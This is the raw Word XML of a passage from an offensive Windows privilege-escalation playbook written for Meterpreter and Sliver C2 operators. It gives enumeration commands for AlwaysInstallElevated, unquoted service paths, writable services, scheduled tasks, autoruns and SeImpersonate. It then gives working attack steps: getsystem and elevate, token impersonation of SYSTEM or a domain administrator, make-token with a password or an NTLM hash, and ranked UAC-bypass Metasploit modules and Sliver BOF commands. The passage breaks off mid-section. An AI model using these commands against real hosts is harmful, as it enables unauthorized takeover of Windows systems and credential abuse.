    <w:p w14:paraId="6BD90B5D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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95DC8F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="103B1179" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3.1 – Check AlwaysInstallElevated (Registry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A1949" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548F20E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7ACDDE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44387BC4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0D7EF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4398BB79" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555CEE04" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69240038" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25294C59" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3C62AA4E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If both are 1 -&gt; YES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C401D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2CA460D8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3.2 – Unquoted Service Paths (Manual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923FCCF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>──────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A66FD6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D2806" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299572BB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell wmic service get name,pathname | findstr /i "Program Files"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F2FD8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="0FBB6F5A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB892B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9F64F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="702B1DAC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3.3 – Writable Service Permissions (SC &amp; AccessChk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E3BAE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE46724" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38559D41" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload accesschk.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477EA3E6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell accesschk -uwcqv "Authenticated Users" * /accepteula</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60628DDD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell accesschk -uwcqv "BUILTIN\Users" * /accepteula</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE932EC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="70536731" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAAC60" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload accesschk.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3B62B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -o accesschk.exe -a "-uwcqv 'Authenticated Users' * /accepteula"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73905A8C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="03EE9F47" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3.4 – Modifiable Scheduled Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461285A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56026D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7E17E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell schtasks /query /fo LIST /v | findstr /i "taskname" &amp;&amp; findstr /i "run as"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47828D11" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="766AAD66" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B154B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell schtasks /query /fo LIST /v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BCC605" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2C059DB0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3.5 – Modifiable Registry Autoruns (Startup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F23C1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B9382" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6A762" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73704D8A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B9966" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318B80A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="16595D9C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68D474" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    same as above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB5B7B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7DE14264" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3.6 – Named Pipes &amp; Services (SeImpersonate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BCE5D2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC98DEA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156480A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell whoami /priv | findstr Impersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06166F0B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Look for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEB072" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="39B3C8C6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A3915" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell whoami /priv | findstr Impersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCBCB7" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2E40630B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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7245710" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 4: EXPLOITATION TECHNIQUES – THE FULL ARSENAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CF83F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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03C7743" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2AB7E7CF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.1 – TOKEN MANIPULATION (The Quickest Win)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C44B8F4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23785F2E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="5BE828D2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>A) getuid / getsystem (Meterpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7472FA92" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Meterpreter &gt; getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A039DA9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        - Tries named pipe impersonation, token duplication, EfsPotato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C44883" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        - If UAC blocks it, you need BypassUAC first (see 4.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401ECDFD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="78D13B3F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>B) elevate (Sliver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDAE603" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Sliver &gt; elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6B9D0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        - Tries all built-in methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03274B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        - Specific flags: elevate -m efs, elevate -m dupes, elevate -m namedpipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66075411" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4230F8B3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>C) Token impersonation (Incognito / Impersonate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1D3C6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E65097" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    load incognito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE557E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    list_tokens -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12BC29" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    impersonate_token "NT AUTHORITY\SYSTEM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC92E42" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400911C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    impersonate_token "DOMAIN\Administrator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CBD809" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1B2B8439" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C45F6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    impersonate -l   (list available tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94E49C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    impersonate "NT AUTHORITY\SYSTEM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412D9EA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="023EA40D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>D) Create token with password/hash (Pass-the-Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3828497C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C97EDD1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Not directly – use PsExec or wmiexec modules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B5E9D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB99842" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    make-token -u DOMAIN\Administrator -p Password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712F31E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    make-token -u DOMAIN\Administrator -H NTLM_HASH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05A942" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2D3AF6E9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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A1F0962" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="23B7CC0C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.2 – UAC BYPASS (When You Are Already Local Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B9ADC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710D419" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you are in the "BUILTIN\Administrators" group but still can't elevate – UAC is blocking you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA58552" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Use these modules to bypass (all require admin rights beforehand).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F86426" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="5F26B29C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>List of reliable UAC bypass methods (ranked by success rate):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9EFC56" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="70435E22" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1. Fodhelper (Windows 10/11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F37F5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2. SilentCleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292AAB7" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3. Sdclt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABF9DB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4. EventViewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D3C6C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5. ComputerDefaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223CA6F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>6. WUSA (Windows Update Standalone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219DDF1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>7. Sysprep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55642351" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>8. ColorCpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DABC02D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>9. CplApplet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F871D0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>10. Slui (Windows 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16330EF5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3FD1910A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER (Metasploit modules):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B603C6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/bypassuac_fodhelper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBA64A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/bypassuac_silentcleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E712D0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/bypassuac_sdclt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C99CAB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/bypassuac_injection_winsxs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BFD33" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/bypassuac_eventvwr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D6665" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/bypassuac_comhijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDF480" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6D29BB19" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    set SESSION &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB9DCC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E194B7" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="30132931" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER (UAC Bypass BOFs &amp; execute-assembly tools):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A200840" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Method 1: Use UAC-BOF-Bonanza extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E97C14" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        (Load the extension first: extensions load UAC-BOF-Bonanza)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49FCA2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        uac-bypass-fodhelper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DA5DF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        uac-bypass-silentcleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B813FBE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="68772CCB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
